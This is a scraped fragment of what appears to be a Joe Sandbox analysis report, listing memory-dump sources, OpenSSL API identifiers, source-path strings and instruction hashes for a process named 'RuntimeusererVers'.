                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 53016D35B09F8180EA919B16E8442A8A390FF44FE4F084231EE5D5BB99EF3CE5928704
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: O_free
                                                                                                                                                                                                                                          • String ID: ..\s\ssl\statem\extensions_cust.c
                                                                                                                                                                                                                                          • API String ID: 2581946324-3973221358
                                                                                                                                                                                                                                          • Opcode ID: 3cf5db9897d16314f6c406a7537cbdf5f713d31316b71214a26921031eca8072
                                                                                                                                                                                                                                          • Instruction ID: eb5d69746c715fc94bdba84048781833812b487206aa8e3bd5a1fc41f272cc58
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3cf5db9897d16314f6c406a7537cbdf5f713d31316b71214a26921031eca8072
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 18018031B19E0281EB10DB15E4405A9A761FF84BE4F088236EE8D47799DF7CF150C740
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: O_freeO_memdup
                                                                                                                                                                                                                                          • String ID: D:\a\1\s\ssl\packet_local.h
                                                                                                                                                                                                                                          • API String ID: 3962629258-373350680
                                                                                                                                                                                                                                          • Opcode ID: 6eceafe0f9ac89be950eaf40397fa8a42b0b463cabdcf8e0bbc67e2867511beb
                                                                                                                                                                                                                                          • Instruction ID: 82208a05d35702b9b0cbf74fc36db078b80ffcacae92cdcf1eeab611d0fb362b
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6eceafe0f9ac89be950eaf40397fa8a42b0b463cabdcf8e0bbc67e2867511beb
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B201E132B06F4181EB518F15E84065977A4FB58BD0F089531EE9C97B59DF3CE5918700
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1577633708.00007FF81E081000.00000020.00000001.01000000.0000003C.sdmp, Offset: 00007FF81E080000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81e080000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: O_zallocR_put_error
                                                                                                                                                                                                                                          • String ID: ..\s\ssl\packet.c
                                                                                                                                                                                                                                          • API String ID: 2718799170-1434567093
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1577633708.00007FF81E081000.00000020.00000001.01000000.0000003C.sdmp, Offset: 00007FF81E080000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81e080000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: O_freeO_strdup
                                                                                                                                                                                                                                          • String ID: ..\s\ssl\ssl_sess.c
                                                                                                                                                                                                                                          • API String ID: 2148955802-2868363209
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1577633708.00007FF81E081000.00000020.00000001.01000000.0000003C.sdmp, Offset: 00007FF81E080000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81e080000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: O_free
                                                                                                                                                                                                                                          • String ID: ..\s\ssl\record\rec_layer_d1.c
                                                                                                                                                                                                                                          • API String ID: 2581946324-1306860146
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                            • Part of subcall function 00007FF81E081933: CRYPTO_free.LIBCRYPTO-1_1 ref: 00007FF81E0893F5
                                                                                                                                                                                                                                            • Part of subcall function 00007FF81E081933: CRYPTO_free.LIBCRYPTO-1_1 ref: 00007FF81E08940B
                                                                                                                                                                                                                                            • Part of subcall function 00007FF81E081933: CRYPTO_free.LIBCRYPTO-1_1 ref: 00007FF81E089455
                                                                                                                                                                                                                                            • Part of subcall function 00007FF81E081933: CRYPTO_free.LIBCRYPTO-1_1 ref: 00007FF81E08946B
                                                                                                                                                                                                                                            • Part of subcall function 00007FF81E081933: CRYPTO_free.LIBCRYPTO-1_1 ref: 00007FF81E0894B5
                                                                                                                                                                                                                                            • Part of subcall function 00007FF81E081933: CRYPTO_free.LIBCRYPTO-1_1 ref: 00007FF81E0894CB
                                                                                                                                                                                                                                          • CRYPTO_free.LIBCRYPTO-1_1 ref: 00007FF81E086502
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1577633708.00007FF81E081000.00000020.00000001.01000000.0000003C.sdmp, Offset: 00007FF81E080000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81e080000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: O_free
                                                                                                                                                                                                                                          • String ID: ..\s\ssl\d1_lib.c
                                                                                                                                                                                                                                          • API String ID: 2581946324-490761327
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1577633708.00007FF81E081000.00000020.00000001.01000000.0000003C.sdmp, Offset: 00007FF81E080000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81e080000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: O_free
                                                                                                                                                                                                                                          • String ID: ..\s\ssl\record\ssl3_record.c
                                                                                                                                                                                                                                          • API String ID: 2581946324-2721125279
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1577633708.00007FF81E081000.00000020.00000001.01000000.0000003C.sdmp, Offset: 00007FF81E080000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81e080000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: O_clear_free
                                                                                                                                                                                                                                          • String ID: ..\s\ssl\s3_enc.c
                                                                                                                                                                                                                                          • API String ID: 2011826501-1839494539
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1577633708.00007FF81E081000.00000020.00000001.01000000.0000003C.sdmp, Offset: 00007FF81E080000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81e080000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: O_free
                                                                                                                                                                                                                                          • String ID: ..\s\ssl\s3_lib.c
                                                                                                                                                                                                                                          • API String ID: 2581946324-4238427508
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1577633708.00007FF81E081000.00000020.00000001.01000000.0000003C.sdmp, Offset: 00007FF81E080000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81e080000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: D_read_lockD_unlock
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 102331797-0
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1566630025.00007FF81DC81000.00000020.00000001.01000000.0000004C.sdmp, Offset: 00007FF81DC80000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81dc80000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: memset
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 2221118986-0
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1566630025.00007FF81DC81000.00000020.00000001.01000000.0000004C.sdmp, Offset: 00007FF81DC80000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81dc80000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 0-3916222277
                                                                                                                                                                                                                                          • Opcode ID: 997ff8a94a22a667294433b268bb057fe07759ebb41b8671547e7ed2cd4c522e
                                                                                                                                                                                                                                          • Instruction ID: 27aed64d0bdeb99a9a0fa44b73c1427e42bba1ee77edb8e1dcd57f0d6914405b
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 997ff8a94a22a667294433b268bb057fe07759ebb41b8671547e7ed2cd4c522e
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: FC72C2B3B18A8186DB14CF15D0403AEBBA1F784BD8F109525EA8E57B98EF3CD546CB40
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1582033096.00007FF81E4E1000.00000020.00000001.01000000.00000037.sdmp, Offset: 00007FF81E4E0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1581472246.00007FF81E4E0000.00000002.00000001.01000000.00000037.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1582460342.00007FF81E4E7000.00000002.00000001.01000000.00000037.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1582744405.00007FF81E4EC000.00000004.00000001.01000000.00000037.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1582953118.00007FF81E4EE000.00000002.00000001.01000000.00000037.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81e4e0000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: O_memcmp
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 2788248766-0
                                                                                                                                                                                                                                          • Opcode ID: f2f19358fdefe772f3d941217dcd33b6ed316f586bdbc45e2d4c484ba26bcc2d
                                                                                                                                                                                                                                          • Instruction ID: a2c04fa886735a2c9cb8581ed873478990a3661941b80f01f470eb5fec4a92ab
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f2f19358fdefe772f3d941217dcd33b6ed316f586bdbc45e2d4c484ba26bcc2d
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: ADD0C212F04B8D42DE0CC7A7BE844A891525BACBD074D8039AE0D83B55C82CD4E04500
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1577633708.00007FF81E081000.00000020.00000001.01000000.0000003C.sdmp, Offset: 00007FF81E080000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1577554084.00007FF81E080000.00000002.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1577633708.00007FF81E0F4000.00000020.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1577887521.00007FF81E0F6000.00000002.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578021546.00007FF81E119000.00000008.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578087716.00007FF81E11D000.00000004.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578182269.00007FF81E11E000.00000002.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578182269.00007FF81E124000.00000002.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578182269.00007FF81E12B000.00000002.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81e080000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: O_memcmp
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 2788248766-0
                                                                                                                                                                                                                                          • Opcode ID: 6a6d465780acf7ed9e56836580813f18a6b0f1139c5b2302c9c2a56e0bb2ae19
                                                                                                                                                                                                                                          • Instruction ID: 6b0bc8ef1e9948f10a254ba9748e7aabb8ef379ca1305c4de1698bcb3671f620
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6a6d465780acf7ed9e56836580813f18a6b0f1139c5b2302c9c2a56e0bb2ae19
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: DDD0A715F0280242EA48B27D8D4206902D07B403E0F944034F50DC1681CC1DE9E74601
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1577633708.00007FF81E081000.00000020.00000001.01000000.0000003C.sdmp, Offset: 00007FF81E080000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1577554084.00007FF81E080000.00000002.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1577633708.00007FF81E0F4000.00000020.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1577887521.00007FF81E0F6000.00000002.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578021546.00007FF81E119000.00000008.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578087716.00007FF81E11D000.00000004.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578182269.00007FF81E11E000.00000002.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578182269.00007FF81E124000.00000002.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578182269.00007FF81E12B000.00000002.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81e080000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: D_run_once
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 1403826838-0
                                                                                                                                                                                                                                          • Opcode ID: d055155e7dfa394d9151ded48a12c15ff788ed91f46543e9f8dab3fed7f81b86
                                                                                                                                                                                                                                          • Instruction ID: 2d9a541ea31424d9810e2d06ea9e2573f93bcded251f386b8a58280b052ec19d
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d055155e7dfa394d9151ded48a12c15ff788ed91f46543e9f8dab3fed7f81b86
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1BD09E64F09D07D6FA48B739D8565B523A07F543A1F804235E40DC2961DD1CBD168611
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1566630025.00007FF81DC81000.00000020.00000001.01000000.0000004C.sdmp, Offset: 00007FF81DC80000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1566533062.00007FF81DC80000.00000002.00000001.01000000.0000004C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1566733514.00007FF81DCF0000.00000002.00000001.01000000.0000004C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1566834430.00007FF81DCFC000.00000004.00000001.01000000.0000004C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1566886856.00007FF81DCFD000.00000008.00000001.01000000.0000004C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1566941654.00007FF81DCFE000.00000004.00000001.01000000.0000004C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1566971006.00007FF81DCFF000.00000002.00000001.01000000.0000004C.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81dc80000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: d43bf9476157c61777fd4b65358fbb4361eb85a2052333b4f96e7bbfdd0438b9
                                                                                                                                                                                                                                          • Instruction ID: 8f286a0c2c7796c09a7375757fc794c7818ddf14fec6a19d2deb9cbfbebcbc5c
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d43bf9476157c61777fd4b65358fbb4361eb85a2052333b4f96e7bbfdd0438b9
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6D42C2B3B08B8686DB24CF19E0406ADB761F784BD8F548621DB8D57B58EF38D946CB40
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1566630025.00007FF81DC81000.00000020.00000001.01000000.0000004C.sdmp, Offset: 00007FF81DC80000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1566533062.00007FF81DC80000.00000002.00000001.01000000.0000004C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1566733514.00007FF81DCF0000.00000002.00000001.01000000.0000004C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1566834430.00007FF81DCFC000.00000004.00000001.01000000.0000004C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1566886856.00007FF81DCFD000.00000008.00000001.01000000.0000004C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1566941654.00007FF81DCFE000.00000004.00000001.01000000.0000004C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1566971006.00007FF81DCFF000.00000002.00000001.01000000.0000004C.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81dc80000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1566886856.00007FF81DCFD000.00000008.00000001.01000000.0000004C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1566941654.00007FF81DCFE000.00000004.00000001.01000000.0000004C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1566971006.00007FF81DCFF000.00000002.00000001.01000000.0000004C.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81dc80000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 1e384db6e6ba6d2bd346d3fe740ed78d38d2f84f755f0f7c26ab865e24dce5ad
                                                                                                                                                                                                                                          • Instruction ID: 3de9122ee2d9320af1d824d922ace24619f0dddf25783f1d93daddda79750a58
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1e384db6e6ba6d2bd346d3fe740ed78d38d2f84f755f0f7c26ab865e24dce5ad
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 16E11373724A848BDB10CF29E454A59BBA5F399BD4F055229EF8E83B44EB3DD815CB00
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1566630025.00007FF81DC81000.00000020.00000001.01000000.0000004C.sdmp, Offset: 00007FF81DC80000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1566533062.00007FF81DC80000.00000002.00000001.01000000.0000004C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1566733514.00007FF81DCF0000.00000002.00000001.01000000.0000004C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1566834430.00007FF81DCFC000.00000004.00000001.01000000.0000004C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1566886856.00007FF81DCFD000.00000008.00000001.01000000.0000004C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1566941654.00007FF81DCFE000.00000004.00000001.01000000.0000004C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1566971006.00007FF81DCFF000.00000002.00000001.01000000.0000004C.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81dc80000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: d4b680c8fbf9edb19979a811f10c2301062f0395a2d2f5e894b0dd5952d67d99
                                                                                                                                                                                                                                          • Instruction ID: 1456e035284282d32c10e4ffb80c3e33d79a299c18320b18c1fa6e5d065487c4
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d4b680c8fbf9edb19979a811f10c2301062f0395a2d2f5e894b0dd5952d67d99
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: ACE14433618AA48BD710CF29E444A69BBA1F389794F155239EF9E83B54EB3DD905CF00
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1566630025.00007FF81DC81000.00000020.00000001.01000000.0000004C.sdmp, Offset: 00007FF81DC80000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1566533062.00007FF81DC80000.00000002.00000001.01000000.0000004C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1566733514.00007FF81DCF0000.00000002.00000001.01000000.0000004C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1566834430.00007FF81DCFC000.00000004.00000001.01000000.0000004C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1566886856.00007FF81DCFD000.00000008.00000001.01000000.0000004C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1566941654.00007FF81DCFE000.00000004.00000001.01000000.0000004C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1566971006.00007FF81DCFF000.00000002.00000001.01000000.0000004C.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81dc80000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 5dbf220896b3b4117e890ca3f7163f3f9e30713cbcf527afac9cea0a4bd4d305
                                                                                                                                                                                                                                          • Instruction ID: 1cdd87c28445d841d85fe19002ac1b571e95feeebb2357fb49c47ec7c64adbb8
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5dbf220896b3b4117e890ca3f7163f3f9e30713cbcf527afac9cea0a4bd4d305
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4A610B23B1995146EB128E2CD404B6DAA52FB847B4F499731DE1E83BE1EB7DD887C300
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1577633708.00007FF81E081000.00000020.00000001.01000000.0000003C.sdmp, Offset: 00007FF81E080000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1577554084.00007FF81E080000.00000002.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1577633708.00007FF81E0F4000.00000020.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1577887521.00007FF81E0F6000.00000002.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578021546.00007FF81E119000.00000008.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578087716.00007FF81E11D000.00000004.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578182269.00007FF81E11E000.00000002.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578182269.00007FF81E124000.00000002.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578182269.00007FF81E12B000.00000002.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81e080000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 6c48ac75e1baa7433b9948ebc01d76e73772f8258ce357988e5072d9454c145e
                                                                                                                                                                                                                                          • Instruction ID: bae87fece81e006a0e566259507cd4b39abfed8ce1a90f60d0fd01c0f20beb6c
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6c48ac75e1baa7433b9948ebc01d76e73772f8258ce357988e5072d9454c145e
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E7115462F585A302F7F4DA7A7836F576581BBC5788F44A231AF4942D869F7C91000D04

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1578637831.00007FF81E131000.00000020.00000001.01000000.0000003B.sdmp, Offset: 00007FF81E130000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81e130000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Dealloc$String$Dict_$Item$List_$X509_$From$SizeUnicode_$AppendE_printO_ctrlO_freeO_getsTupleX509_get0_notY_set$AfterBeforeE_entry_countE_get_entryErr_LongLong_O_newO_s_memX509_get_issuer_nameX509_get_subject_nameX509_get_versionY_get_dataY_get_object
                                                                                                                                                                                                                                          • String ID: OCSP$caIssuers$crlDistributionPoints$failed to allocate BIO$issuer$notAfter$notBefore$serialNumber$subject$subjectAltName$version
                                                                                                                                                                                                                                          • API String ID: 558561668-857226466
                                                                                                                                                                                                                                          • Opcode ID: 5cdc1d4fa55c418fd77a41406b52edc68a5df86abf3f78be9c08855c21ee90f8
                                                                                                                                                                                                                                          • Instruction ID: 4b7a613aa92777a4848d9389e0c5c7a0b622e1eba54912592cb61c77a5ab30f1
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5cdc1d4fa55c418fd77a41406b52edc68a5df86abf3f78be9c08855c21ee90f8
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C8D12425A0AF4382FE559B22E96427967A1BF86FF2F844630DD0E46B54EF3DF4948340

                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1582033096.00007FF81E4E1000.00000020.00000001.01000000.00000037.sdmp, Offset: 00007FF81E4E0000, based on PE: true
• Associated: 00000030.00000002.1581472246.00007FF81E4E0000.00000002.00000001.01000000.00000037.sdmp
• Associated: 00000030.00000002.1582460342.00007FF81E4E7000.00000002.00000001.01000000.00000037.sdmp
• Associated: 00000030.00000002.1582744405.00007FF81E4EC000.00000004.00000001.01000000.00000037.sdmp
• Associated: 00000030.00000002.1582953118.00007FF81E4EE000.00000002.00000001.01000000.00000037.sdmp
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81e4e0000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
